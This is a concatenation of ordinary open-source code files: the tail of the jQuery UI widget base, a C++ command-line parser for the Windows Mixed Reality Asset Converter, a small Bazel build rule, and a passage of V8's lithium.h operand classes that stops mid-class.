instance.option( options || {} )._init();
} else {
$.data( this, fullName, new object( options, this ) );
}
});
}
return returnValue;
};
};
// Base widget: supplies the option get/set machinery, namespaced event
// binding/teardown and the create/init/destroy lifecycle that every widget
// built with $.widget shares.
$.Widget = function( /* options, element */ ) {};
$.Widget._childConstructors = [];
$.Widget.prototype = {
widgetName: "widget",
widgetEventPrefix: "",
defaultElement: "<div>",
options: {
disabled: false,
// callbacks
create: null
},
// Shared constructor logic: merges options, stores the instance via $.data,
// self-destroys when the element is removed, and resolves document/window.
_createWidget: function( options, element ) {
element = $( element || this.defaultElement || this )[ 0 ];
this.element = $( element );
this.uuid = uuid++;
this.eventNamespace = "." + this.widgetName + this.uuid;
this.options = $.widget.extend( {},
this.options,
this._getCreateOptions(),
options );
this.bindings = $();
this.hoverable = $();
this.focusable = $();
if ( element !== this ) {
// 1.9 BC for #7810
// TODO remove dual storage
$.data( element, this.widgetName, this );
$.data( element, this.widgetFullName, this );
this._on( true, this.element, {
remove: function( event ) {
if ( event.target === element ) {
this.destroy();
}
}
});
this.document = $( element.style ?
// element within the document
element.ownerDocument :
// element is window or document
element.document || element );
this.window = $( this.document[0].defaultView || this.document[0].parentWindow );
}
this._create();
this._trigger( "create", null, this._getCreateEventData() );
this._init();
},
// Extension points; subclasses override as needed.
_getCreateOptions: $.noop,
_getCreateEventData: $.noop,
_create: $.noop,
_init: $.noop,
// Public teardown: runs the subclass _destroy(), then removes stored data,
// namespaced events and state classes added by the base widget.
destroy: function() {
this._destroy();
// we can probably remove the unbind calls in 2.0
// all event bindings should go through this._on()
this.element
.unbind( this.eventNamespace )
// 1.9 BC for #7810
// TODO remove dual storage
.removeData( this.widgetName )
.removeData( this.widgetFullName )
// support: jquery <1.6.3
// http://bugs.jquery.com/ticket/9413
.removeData( $.camelCase( this.widgetFullName ) );
this.widget()
.unbind( this.eventNamespace )
.removeAttr( "aria-disabled" )
.removeClass(
this.widgetFullName + "-disabled " +
"ui-state-disabled" );
// clean up events and states
this.bindings.unbind( this.eventNamespace );
this.hoverable.removeClass( "ui-state-hover" );
this.focusable.removeClass( "ui-state-focus" );
},
_destroy: $.noop,
// Returns the widget's outermost element; wrapping widgets override this.
widget: function() {
return this.element;
},
// Option getter/setter. Supports: no args (returns a copy of all options),
// a nested "foo.bar" key, a plain key, or a hash of options to set.
option: function( key, value ) {
var options = key,
parts,
curOption,
i;
if ( arguments.length === 0 ) {
// don't return a reference to the internal hash
return $.widget.extend( {}, this.options );
}
if ( typeof key === "string" ) {
// handle nested keys, e.g., "foo.bar" => { foo: { bar: ___ } }
options = {};
parts = key.split( "." );
key = parts.shift();
if ( parts.length ) {
curOption = options[ key ] = $.widget.extend( {}, this.options[ key ] );
for ( i = 0; i < parts.length - 1; i++ ) {
curOption[ parts[ i ] ] = curOption[ parts[ i ] ] || {};
curOption = curOption[ parts[ i ] ];
}
key = parts.pop();
if ( value === undefined ) {
return curOption[ key ] === undefined ? null : curOption[ key ];
}
curOption[ key ] = value;
} else {
if ( value === undefined ) {
return this.options[ key ] === undefined ? null : this.options[ key ];
}
options[ key ] = value;
}
}
this._setOptions( options );
return this;
},
// Applies a hash of options one key at a time through _setOption.
_setOptions: function( options ) {
var key;
for ( key in options ) {
this._setOption( key, options[ key ] );
}
return this;
},
// Applies a single option; "disabled" also toggles state classes and ARIA.
_setOption: function( key, value ) {
this.options[ key ] = value;
if ( key === "disabled" ) {
this.widget()
.toggleClass( this.widgetFullName + "-disabled ui-state-disabled", !!value )
.attr( "aria-disabled", value );
this.hoverable.removeClass( "ui-state-hover" );
this.focusable.removeClass( "ui-state-focus" );
}
return this;
},
enable: function() {
return this._setOption( "disabled", false );
},
disable: function() {
return this._setOption( "disabled", true );
},
// Namespaced event binding. Handlers are suppressed while the widget is
// disabled unless suppressDisabledCheck is true; keys of the form
// "event selector" are delegated, plain "event" keys are bound directly.
_on: function( suppressDisabledCheck, element, handlers ) {
var delegateElement,
instance = this;
// no suppressDisabledCheck flag, shuffle arguments
if ( typeof suppressDisabledCheck !== "boolean" ) {
handlers = element;
element = suppressDisabledCheck;
suppressDisabledCheck = false;
}
// no element argument, shuffle and use this.element
if ( !handlers ) {
handlers = element;
element = this.element;
delegateElement = this.widget();
} else {
// accept selectors, DOM elements
element = delegateElement = $( element );
this.bindings = this.bindings.add( element );
}
$.each( handlers, function( event, handler ) {
function handlerProxy() {
// allow widgets to customize the disabled handling
// - disabled as an array instead of boolean
// - disabled class as method for disabling individual parts
if ( !suppressDisabledCheck &&
( instance.options.disabled === true ||
$( this ).hasClass( "ui-state-disabled" ) ) ) {
return;
}
return ( typeof handler === "string" ? instance[ handler ] : handler )
.apply( instance, arguments );
}
// copy the guid so direct unbinding works
if ( typeof handler !== "string" ) {
handlerProxy.guid = handler.guid =
handler.guid || handlerProxy.guid || $.guid++;
}
var match = event.match( /^(\w+)\s*(.*)$/ ),
eventName = match[1] + instance.eventNamespace,
selector = match[2];
if ( selector ) {
delegateElement.delegate( selector, eventName, handlerProxy );
} else {
element.bind( eventName, handlerProxy );
}
});
},
// Removes bindings made through _on for the given (space-separated) events.
_off: function( element, eventName ) {
eventName = (eventName || "").split( " " ).join( this.eventNamespace + " " ) + this.eventNamespace;
element.unbind( eventName ).undelegate( eventName );
},
// setTimeout wrapper bound to this instance. Note: `instance` is referenced
// before its `var` line, but hoisting guarantees it is assigned before the
// timer can possibly fire.
_delay: function( handler, delay ) {
function handlerProxy() {
return ( typeof handler === "string" ? instance[ handler ] : handler )
.apply( instance, arguments );
}
var instance = this;
return setTimeout( handlerProxy, delay || 0 );
},
// Tracks elements that should toggle ui-state-hover on mouse enter/leave.
_hoverable: function( element ) {
this.hoverable = this.hoverable.add( element );
this._on( element, {
mouseenter: function( event ) {
$( event.currentTarget ).addClass( "ui-state-hover" );
},
mouseleave: function( event ) {
$( event.currentTarget ).removeClass( "ui-state-hover" );
}
});
},
// Tracks elements that should toggle ui-state-focus on focus in/out.
_focusable: function( element ) {
this.focusable = this.focusable.add( element );
this._on( element, {
focusin: function( event ) {
$( event.currentTarget ).addClass( "ui-state-focus" );
},
focusout: function( event ) {
$( event.currentTarget ).removeClass( "ui-state-focus" );
}
});
},
// Fires "<widgetEventPrefix><type>" on the element (copying originalEvent
// properties onto the new event), then invokes the matching callback option.
// Returns false when the callback returned false or default was prevented.
_trigger: function( type, event, data ) {
var prop, orig,
callback = this.options[ type ];
data = data || {};
event = $.Event( event );
event.type = ( type === this.widgetEventPrefix ?
type :
this.widgetEventPrefix + type ).toLowerCase();
// the original event may come from any element
// so we need to reset the target on the new event
event.target = this.element[ 0 ];
// copy original event properties over to the new event
orig = event.originalEvent;
if ( orig ) {
for ( prop in orig ) {
if ( !( prop in event ) ) {
event[ prop ] = orig[ prop ];
}
}
}
this.element.trigger( event, data );
return !( $.isFunction( callback ) &&
callback.apply( this.element[0], [ event ].concat( data ) ) === false ||
event.isDefaultPrevented() );
}
};
// Builds $.Widget.prototype._show/_hide. Resolution order: a jQuery UI
// effect when the effects core is loaded, else a same-named element method
// (e.g. element.fadeIn), else plain show/hide queued so the callback still
// runs after the change.
$.each( { show: "fadeIn", hide: "fadeOut" }, function( method, defaultEffect ) {
$.Widget.prototype[ "_" + method ] = function( element, options, callback ) {
if ( typeof options === "string" ) {
options = { effect: options };
}
var hasOptions,
effectName = !options ?
method :
options === true || typeof options === "number" ?
defaultEffect :
options.effect || defaultEffect;
options = options || {};
if ( typeof options === "number" ) {
options = { duration: options };
}
hasOptions = !$.isEmptyObject( options );
options.complete = callback;
if ( options.delay ) {
element.delay( options.delay );
}
if ( hasOptions && $.effects && ( $.effects.effect[ effectName ] || $.uiBackCompat !== false && $.effects[ effectName ] ) ) {
element[ method ]( options );
} else if ( effectName !== method && element[ effectName ] ) {
element[ effectName ]( options.duration, options.easing, callback );
} else {
element.queue(function( next ) {
$( this )[ method ]();
if ( callback ) {
callback.call( element[ 0 ] );
}
next();
});
}
};
});
// DEPRECATED
if ( $.uiBackCompat !== false ) {
// 1.8 back-compat: seed create-time options from the jQuery Metadata
// plugin ($.metadata), when that plugin is loaded.
$.Widget.prototype._getCreateOptions = function() {
return $.metadata && $.metadata.get( this.element[0] )[ this.widgetName ];
};
}
})( jQuery );
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
#include "stdafx.h"
#include "CommandLine.h"
#include "FileSystem.h"
// Constants
// Command-line switch names recognized by the parser.
const wchar_t * PARAM_OUTFILE = L"-o";
const wchar_t * PARAM_TMPDIR = L"-temp-directory";
const wchar_t * PARAM_LOD = L"-lod";
const wchar_t * PARAM_SCREENCOVERAGE = L"-screen-coverage";
const wchar_t * PARAM_MAXTEXTURESIZE = L"-max-texture-size";
const wchar_t * PARAM_SHARE_MATERIALS = L"-share-materials";
const wchar_t * PARAM_MIN_VERSION = L"-min-version";
const wchar_t * PARAM_PLATFORM = L"-platform";
const wchar_t * PARAM_REPLACE_TEXTURES = L"-replace-textures";
const wchar_t * PARAM_COMPRESS_MESHES = L"-compress-meshes";
// Accepted values for -min-version (release numbers plus Redstone aliases).
const wchar_t * PARAM_VALUE_VERSION_1709 = L"1709";
const wchar_t * PARAM_VALUE_VERSION_1803 = L"1803";
const wchar_t * PARAM_VALUE_VERSION_1809 = L"1809";
const wchar_t * PARAM_VALUE_VERSION_RS3 = L"rs3";
const wchar_t * PARAM_VALUE_VERSION_RS4 = L"rs4";
const wchar_t * PARAM_VALUE_VERSION_RS5 = L"rs5";
const wchar_t * PARAM_VALUE_VERSION_LATEST = L"latest";
// Accepted values for -platform.
const wchar_t * PARAM_VALUE_HOLOGRAPHIC = L"holographic";
const wchar_t * PARAM_VALUE_HOLOLENS = L"hololens";
const wchar_t * PARAM_VALUE_DESKTOP = L"desktop";
const wchar_t * PARAM_VALUE_PC = L"pc";
const wchar_t * PARAM_VALUE_ALL = L"all";
// Output-file suffix and help-text indentation.
const wchar_t * SUFFIX_CONVERTED = L"_converted";
const wchar_t * CLI_INDENT = L"  ";
// Defaults and limits used when a switch is absent or out of range.
const size_t MAXTEXTURESIZE_DEFAULT = 512;
const size_t MAXTEXTURESIZE_MAX = 4096;
const CommandLine::Version MIN_VERSION_DEFAULT = CommandLine::Version::Version1709;
const CommandLine::Platform PLATFORM_DEFAULT = CommandLine::Platform::Desktop;
// State machine for argument parsing: after a switch such as -o or -lod is
// seen, the state records how the following value token(s) should be
// interpreted. InputRead means "expecting the next switch".
enum class CommandLineParsingState
{
Initial,
InputRead,
ReadOutFile,
ReadTmpDir,
ReadLods,
ReadScreenCoverage,
ReadMaxTextureSize,
ReadMinVersion,
ReadPlatform
};
// Writes the tool banner, usage line, optional-argument reference and an
// example invocation to stderr (wide stream, so it interleaves with other
// wcerr diagnostics).
void CommandLine::PrintHelp()
{
auto indent = std::wstring(CLI_INDENT);
std::wcerr << std::endl
<< L"Windows Mixed Reality Asset Converter" << std::endl
<< L"=====================================" << std::endl
<< std::endl
<< L"A command line tool to convert core GLTF 2.0 assets for use in "
<< L"the Windows Mixed Reality home, with the proper texture packing, compression and merged LODs." << std::endl << std::endl
<< L"Usage: WindowsMRAssetConverter <path to GLTF/GLB>" << std::endl
<< std::endl
<< L"Optional arguments:" << std::endl
<< indent << "[" << std::wstring(PARAM_OUTFILE) << L" <output file path>]" << std::endl
<< indent << "[" << std::wstring(PARAM_TMPDIR) << L" <temporary folder>] - default is the system temp folder for the user" << std::endl
<< indent << "[" << std::wstring(PARAM_PLATFORM) << " <" << PARAM_VALUE_ALL << " | " << PARAM_VALUE_HOLOGRAPHIC << " | " << PARAM_VALUE_DESKTOP << ">] - defaults to " << PARAM_VALUE_DESKTOP << std::endl
<< indent << "[" << std::wstring(PARAM_MIN_VERSION) << " <" << PARAM_VALUE_VERSION_1709 << " | " << PARAM_VALUE_VERSION_1803 << " | " << PARAM_VALUE_VERSION_1809 << " | " << PARAM_VALUE_VERSION_LATEST << ">] - defaults to " << PARAM_VALUE_VERSION_1709 << std::endl
<< indent << "[" << std::wstring(PARAM_LOD) << " <path to each lower LOD asset in descending order of quality>]" << std::endl
<< indent << "[" << std::wstring(PARAM_SCREENCOVERAGE) << " <LOD screen coverage values>]" << std::endl
<< indent << "[" << std::wstring(PARAM_SHARE_MATERIALS) << "] - disabled if not present" << std::endl
<< indent << "[" << std::wstring(PARAM_MAXTEXTURESIZE) << " <Max texture size in pixels>] - defaults to 512" << std::endl
<< indent << "[" << std::wstring(PARAM_REPLACE_TEXTURES) << "] - disabled if not present" << std::endl
<< indent << "[" << std::wstring(PARAM_COMPRESS_MESHES) << "] - compress meshes with Draco" << std::endl
<< std::endl
<< "Example:" << std::endl
<< indent << "WindowsMRAssetConverter FileToConvert.gltf "
<< std::wstring(PARAM_OUTFILE) << " ConvertedFile.glb "
<< std::wstring(PARAM_LOD) << " Lod1.gltf Lod2.gltf "
<< std::wstring(PARAM_SCREENCOVERAGE) << " 0.5 0.2 0.01" << std::endl
<< std::endl
<< "The above will convert \"FileToConvert.gltf\" into \"ConvertedFile.glb\" in the "
<< "current directory." << std::endl
<< std::endl
<< "If the file is a GLB and the output name is not specified, defaults to the same name as input "
<< "+ \"_converted.glb\"." << std::endl
<< std::endl;
}
void CommandLine::ParseCommandLineArguments(
int argc, wchar_t *argv[],
std::wstring& inputFilePath, AssetType& inputAssetType, std::wstring& outFilePath, std::wstring& tempDirectory,
std::vector<std::wstring>& lodFilePaths, std::vector<double>& screenCoveragePercentages, size_t& maxTextureSize,
bool& shareMaterials, Version& minVersion, Platform& targetPlatforms, bool& replaceTextures, bool& compressMeshes)
{
CommandLineParsingState state = CommandLineParsingState::Initial;
inputFilePath = FileSystem::GetFullPath(std::wstring(argv[1]));
inputAssetType = AssetTypeUtils::AssetTypeFromFilePath(inputFilePath);
// Reset input parameters
outFilePath = L"";
tempDirectory = L"";
lodFilePaths.clear();
screenCoveragePercentages.clear();
maxTextureSize = MAXTEXTURESIZE_DEFAULT;
shareMaterials = false;
minVersion = MIN_VERSION_DEFAULT;
targetPlatforms = PLATFORM_DEFAULT;
replaceTextures = false;
compressMeshes = false;
state = CommandLineParsingState::InputRead;
std::wstring outFile;
std::wstring tmpDir;
for (int i = 2; i < argc; i++)
{
std::wstring param = argv[i];
if (param == PARAM_OUTFILE)
{
outFile = L"";
state = CommandLineParsingState::ReadOutFile;
}
else if (param == PARAM_TMPDIR)
{
tmpDir = L"";
state = CommandLineParsingState::ReadTmpDir;
}
else if (param == PARAM_LOD)
{
lodFilePaths.clear();
state = CommandLineParsingState::ReadLods;
}
else if (param == PARAM_SCREENCOVERAGE)
{
screenCoveragePercentages.clear();
state = CommandLineParsingState::ReadScreenCoverage;
}
else if (param == PARAM_MAXTEXTURESIZE)
{
maxTextureSize = MAXTEXTURESIZE_DEFAULT;
state = CommandLineParsingState::ReadMaxTextureSize;
}
else if (param == PARAM_SHARE_MATERIALS)
{
shareMaterials = true;
state = CommandLineParsingState::InputRead;
}
else if (param == PARAM_MIN_VERSION)
{
minVersion = MIN_VERSION_DEFAULT;
state = CommandLineParsingState::ReadMinVersion;
}
else if (param == PARAM_PLATFORM)
{
targetPlatforms = PLATFORM_DEFAULT;
state = CommandLineParsingState::ReadPlatform;
}
else if (param == PARAM_REPLACE_TEXTURES)
{
replaceTextures = true;
state = CommandLineParsingState::InputRead;
}
else if (param == PARAM_COMPRESS_MESHES)
{
if (minVersion >= CommandLine::Version::Version1809)
{
compressMeshes = true;
}
else
{
throw std::invalid_argument("Invalid min version specified with mesh compression; must be at least 1809.");
}
state = CommandLineParsingState::InputRead;
}
else
{
switch (state)
{
case CommandLineParsingState::ReadOutFile:
outFile = FileSystem::GetFullPath(param);
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadTmpDir:
tmpDir = FileSystem::GetFullPath(param);
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadLods:
lodFilePaths.push_back(FileSystem::GetFullPath(param));
break;
case CommandLineParsingState::ReadScreenCoverage:
{
auto paramA = std::string(param.begin(), param.end());
screenCoveragePercentages.push_back(std::atof(paramA.c_str()));
break;
}
case CommandLineParsingState::ReadMaxTextureSize:
maxTextureSize = std::min(static_cast<size_t>(std::stoul(param.c_str())), MAXTEXTURESIZE_MAX);
break;
case CommandLineParsingState::ReadMinVersion:
if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1709) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS3) == 0)
{
minVersion = Version::Version1709;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1803) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS4) == 0)
{
minVersion = Version::Version1803;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1809) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS5) == 0)
{
minVersion = Version::Version1809;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_LATEST) == 0)
{
minVersion = Version::Latest;
}
else
{
throw std::invalid_argument("Invalid min version specified. For help, try the command again without parameters.");
}
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadPlatform:
if (_wcsicmp(param.c_str(), PARAM_VALUE_ALL) == 0)
{
targetPlatforms = (Platform) (Platform::Desktop | Platform::Holographic);
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_HOLOGRAPHIC) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_HOLOLENS) == 0)
{
targetPlatforms = Platform::Holographic;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_DESKTOP) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_PC) == 0)
{
targetPlatforms = Platform::Desktop;
}
else
{
throw std::invalid_argument("Invalid platform specified. For help, try the command again without parameters.");
}
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::Initial:
case CommandLineParsingState::InputRead:
default:
// Invalid argument detected
throw std::invalid_argument("Invalid usage. For help, try the command again without parameters.");
}
}
}
if (!std::experimental::filesystem::exists(inputFilePath))
{
throw std::invalid_argument("Input file not found.");
}
for (auto& lodFilePath : lodFilePaths)
{
if (!std::experimental::filesystem::exists(lodFilePath))
{
throw std::invalid_argument("Lod file not found.");
}
}
if (outFile.empty())
{
std::wstring inputFilePathWithoutExtension = inputFilePath;
if (FAILED(PathCchRemoveExtension(&inputFilePathWithoutExtension[0], inputFilePathWithoutExtension.length() + 1)))
{
throw std::invalid_argument("Invalid input file extension.");
}
outFile = std::wstring(&inputFilePathWithoutExtension[0]);
if (inputAssetType == AssetType::GLB)
{
outFile += SUFFIX_CONVERTED;
}
outFile += EXTENSION_GLB;
}
outFilePath = outFile;
if (tmpDir.empty())
{
tmpDir = FileSystem::CreateTempFolder();
}
tempDirectory = tmpDir;
}
| {
"pile_set_name": "Github"
} |
# Builds the `cabal-toolchain-flags` helper binary via rules_haskell's Cabal
# integration.  srcs globs every file in the package so the .cabal file and
# all sources are handed to Cabal together.
load("@rules_haskell//haskell:cabal.bzl", "haskell_cabal_binary")

haskell_cabal_binary(
    name = "cabal-toolchain-flags",
    srcs = glob(["**"]),
)
| {
"pile_set_name": "Github"
} |
// Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#ifndef V8_LITHIUM_H_
#define V8_LITHIUM_H_
#include "hydrogen.h"
#include "safepoint-table.h"
namespace v8 {
namespace internal {
// Base class of all operands in the Lithium (low-level) IR.  An operand packs
// a Kind tag plus an index into the single word value_: the low
// kKindFieldWidth bits hold the kind, the remaining high bits hold the index.
class LOperand: public ZoneObject {
 public:
  enum Kind {
    INVALID,
    UNALLOCATED,       // Virtual register, not yet assigned (see LUnallocated).
    CONSTANT_OPERAND,  // Index of a constant (see LConstantOperand).
    STACK_SLOT,        // Word-sized spill slot.
    DOUBLE_STACK_SLOT, // Double-sized spill slot.
    REGISTER,          // General-purpose register.
    DOUBLE_REGISTER,   // Floating-point register.
    ARGUMENT           // Slot in the outgoing-arguments area.
  };

  LOperand() : value_(KindField::encode(INVALID)) { }

  Kind kind() const { return KindField::decode(value_); }
  // The index lives in the bits above the kind field.  NOTE: the signed cast
  // relies on arithmetic (sign-extending) right shift, which is
  // implementation-defined in C++, to round-trip negative indices.
  int index() const { return static_cast<int>(value_) >> kKindFieldWidth; }
  bool IsConstantOperand() const { return kind() == CONSTANT_OPERAND; }
  bool IsStackSlot() const { return kind() == STACK_SLOT; }
  bool IsDoubleStackSlot() const { return kind() == DOUBLE_STACK_SLOT; }
  bool IsRegister() const { return kind() == REGISTER; }
  bool IsDoubleRegister() const { return kind() == DOUBLE_REGISTER; }
  bool IsArgument() const { return kind() == ARGUMENT; }
  bool IsUnallocated() const { return kind() == UNALLOCATED; }
  // Two operands are equal iff both kind and index match.
  bool Equals(LOperand* other) const { return value_ == other->value_; }
  int VirtualRegister();

  void PrintTo(StringStream* stream);
  // Re-tags this operand in place; the ASSERT catches indices that do not
  // survive the shift-based encoding (e.g. overflow into the kind bits).
  void ConvertTo(Kind kind, int index) {
    value_ = KindField::encode(kind);
    value_ |= index << kKindFieldWidth;
    ASSERT(this->index() == index);
  }

 protected:
  static const int kKindFieldWidth = 3;
  class KindField : public BitField<Kind, 0, kKindFieldWidth> { };

  LOperand(Kind kind, int index) { ConvertTo(kind, index); }

  unsigned value_;
};
// An as-yet unallocated operand: a virtual register annotated with an
// allocation Policy, an optional fixed register/slot index and a Lifetime.
// All of these share value_ with the base class via the bit fields below.
class LUnallocated: public LOperand {
 public:
  enum Policy {
    NONE,
    ANY,
    FIXED_REGISTER,         // Must use the register named by fixed_index().
    FIXED_DOUBLE_REGISTER,  // Must use the double register at fixed_index().
    FIXED_SLOT,             // Must use the stack slot named by fixed_index().
    MUST_HAVE_REGISTER,
    WRITABLE_REGISTER,
    SAME_AS_FIRST_INPUT,
    IGNORE
  };

  // Lifetime of operand inside the instruction.
  enum Lifetime {
    // USED_AT_START operand is guaranteed to be live only at
    // instruction start. Register allocator is free to assign the same register
    // to some other operand used inside instruction (i.e. temporary or
    // output).
    USED_AT_START,

    // USED_AT_END operand is treated as live until the end of
    // instruction. This means that register allocator will not reuse its
    // register for any other operand inside instruction.
    USED_AT_END
  };

  explicit LUnallocated(Policy policy) : LOperand(UNALLOCATED, 0) {
    Initialize(policy, 0, USED_AT_END);
  }

  LUnallocated(Policy policy, int fixed_index) : LOperand(UNALLOCATED, 0) {
    Initialize(policy, fixed_index, USED_AT_END);
  }

  LUnallocated(Policy policy, Lifetime lifetime) : LOperand(UNALLOCATED, 0) {
    Initialize(policy, 0, lifetime);
  }

  // The superclass has a KindField. Some policies have a signed fixed
  // index in the upper bits.
  static const int kPolicyWidth = 4;
  static const int kLifetimeWidth = 1;
  static const int kVirtualRegisterWidth = 17;

  static const int kPolicyShift = kKindFieldWidth;
  static const int kLifetimeShift = kPolicyShift + kPolicyWidth;
  static const int kVirtualRegisterShift = kLifetimeShift + kLifetimeWidth;
  static const int kFixedIndexShift =
      kVirtualRegisterShift + kVirtualRegisterWidth;

  class PolicyField : public BitField<Policy, kPolicyShift, kPolicyWidth> { };

  class LifetimeField
      : public BitField<Lifetime, kLifetimeShift, kLifetimeWidth> {
  };

  class VirtualRegisterField
      : public BitField<unsigned,
                        kVirtualRegisterShift,
                        kVirtualRegisterWidth> {
  };

  // NOTE(review): this is 2^(kVirtualRegisterWidth + 1), i.e. twice what
  // VirtualRegisterField can actually encode -- confirm the "+ 1" is
  // intentional and not an off-by-one.
  static const int kMaxVirtualRegisters = 1 << (kVirtualRegisterWidth + 1);
  static const int kMaxFixedIndices = 128;

  bool HasIgnorePolicy() const { return policy() == IGNORE; }
  bool HasNoPolicy() const { return policy() == NONE; }
  bool HasAnyPolicy() const {
    return policy() == ANY;
  }
  bool HasFixedPolicy() const {
    return policy() == FIXED_REGISTER ||
        policy() == FIXED_DOUBLE_REGISTER ||
        policy() == FIXED_SLOT;
  }
  bool HasRegisterPolicy() const {
    return policy() == WRITABLE_REGISTER || policy() == MUST_HAVE_REGISTER;
  }
  bool HasSameAsInputPolicy() const {
    return policy() == SAME_AS_FIRST_INPUT;
  }

  Policy policy() const { return PolicyField::decode(value_); }
  void set_policy(Policy policy) {
    value_ &= ~PolicyField::mask();
    value_ |= PolicyField::encode(policy);
  }
  // Signed: the fixed index occupies the topmost bits, so the arithmetic
  // shift recovers its sign (same caveat as LOperand::index()).
  int fixed_index() const {
    return static_cast<int>(value_) >> kFixedIndexShift;
  }

  unsigned virtual_register() const {
    return VirtualRegisterField::decode(value_);
  }

  void set_virtual_register(unsigned id) {
    value_ &= ~VirtualRegisterField::mask();
    value_ |= VirtualRegisterField::encode(id);
  }

  // A fresh ANY-policy operand carrying the same virtual register.
  LUnallocated* CopyUnconstrained() {
    LUnallocated* result = new LUnallocated(ANY);
    result->set_virtual_register(virtual_register());
    return result;
  }

  static LUnallocated* cast(LOperand* op) {
    ASSERT(op->IsUnallocated());
    return reinterpret_cast<LUnallocated*>(op);
  }

  bool IsUsedAtStart() {
    return LifetimeField::decode(value_) == USED_AT_START;
  }

 private:
  // value_ already carries the UNALLOCATED kind tag from the base-class
  // constructor; OR in the remaining bit fields on top of it.
  void Initialize(Policy policy, int fixed_index, Lifetime lifetime) {
    value_ |= PolicyField::encode(policy);
    value_ |= LifetimeField::encode(lifetime);
    value_ |= fixed_index << kFixedIndexShift;
    ASSERT(this->fixed_index() == fixed_index);
  }
};
// A single source -> destination move, as scheduled by the gap resolver.
class LMoveOperands BASE_EMBEDDED {
 public:
  LMoveOperands(LOperand* source, LOperand* destination)
      : source_(source), destination_(destination) {
  }

  LOperand* source() const { return source_; }
  void set_source(LOperand* operand) { source_ = operand; }

  LOperand* destination() const { return destination_; }
  void set_destination(LOperand* operand) { destination_ = operand; }

  // The gap resolver marks moves as "in-progress" by clearing the
  // destination (but not the source).
  bool IsPending() const {
    return destination_ == NULL && source_ != NULL;
  }

  // True if this move reads the given operand, i.e. it must be performed
  // before the operand may be overwritten by another move.
  bool Blocks(LOperand* operand) const {
    return !IsEliminated() && source()->Equals(operand);
  }

  // A move is redundant if it's been eliminated, if its source and
  // destination are the same, or if its destination is unneeded.
  // Evaluation order matters: IsEliminated() must come first because the
  // other checks dereference source_.
  bool IsRedundant() const {
    return IsEliminated() || source_->Equals(destination_) || IsIgnored();
  }

  bool IsIgnored() const {
    return destination_ != NULL &&
        destination_->IsUnallocated() &&
        LUnallocated::cast(destination_)->HasIgnorePolicy();
  }

  // We clear both operands to indicate move that's been eliminated.
  void Eliminate() { source_ = destination_ = NULL; }
  bool IsEliminated() const {
    ASSERT(source_ != NULL || destination_ == NULL);
    return source_ == NULL;
  }

 private:
  LOperand* source_;
  LOperand* destination_;
};
// Operand naming constant number `index`.  Instances with small indices are
// shared from a static cache (filled by SetupCache()) to avoid allocation.
class LConstantOperand: public LOperand {
 public:
  static LConstantOperand* Create(int index) {
    ASSERT(index >= 0);
    if (index < kNumCachedOperands) return &cache[index];
    return new LConstantOperand(index);
  }

  static LConstantOperand* cast(LOperand* op) {
    ASSERT(op->IsConstantOperand());
    return reinterpret_cast<LConstantOperand*>(op);
  }

  static void SetupCache();

 private:
  static const int kNumCachedOperands = 128;
  static LConstantOperand cache[];

  // Default constructor exists only so the static cache can be declared;
  // cache entries are initialized by SetupCache().
  LConstantOperand() : LOperand() { }

  explicit LConstantOperand(int index) : LOperand(CONSTANT_OPERAND, index) { }
};
// Operand naming slot `index` of the outgoing-arguments area.
class LArgument: public LOperand {
 public:
  explicit LArgument(int index) : LOperand(ARGUMENT, index) { }

  static LArgument* cast(LOperand* op) {
    ASSERT(op->IsArgument());
    return reinterpret_cast<LArgument*>(op);
  }
};
// Operand naming word-sized spill slot `index`.  Small indices are served
// from a static cache (filled by SetupCache()) to avoid allocation.
class LStackSlot: public LOperand {
 public:
  static LStackSlot* Create(int index) {
    ASSERT(index >= 0);
    if (index < kNumCachedOperands) return &cache[index];
    return new LStackSlot(index);
  }

  static LStackSlot* cast(LOperand* op) {
    ASSERT(op->IsStackSlot());
    return reinterpret_cast<LStackSlot*>(op);
  }

  static void SetupCache();

 private:
  static const int kNumCachedOperands = 128;
  static LStackSlot cache[];

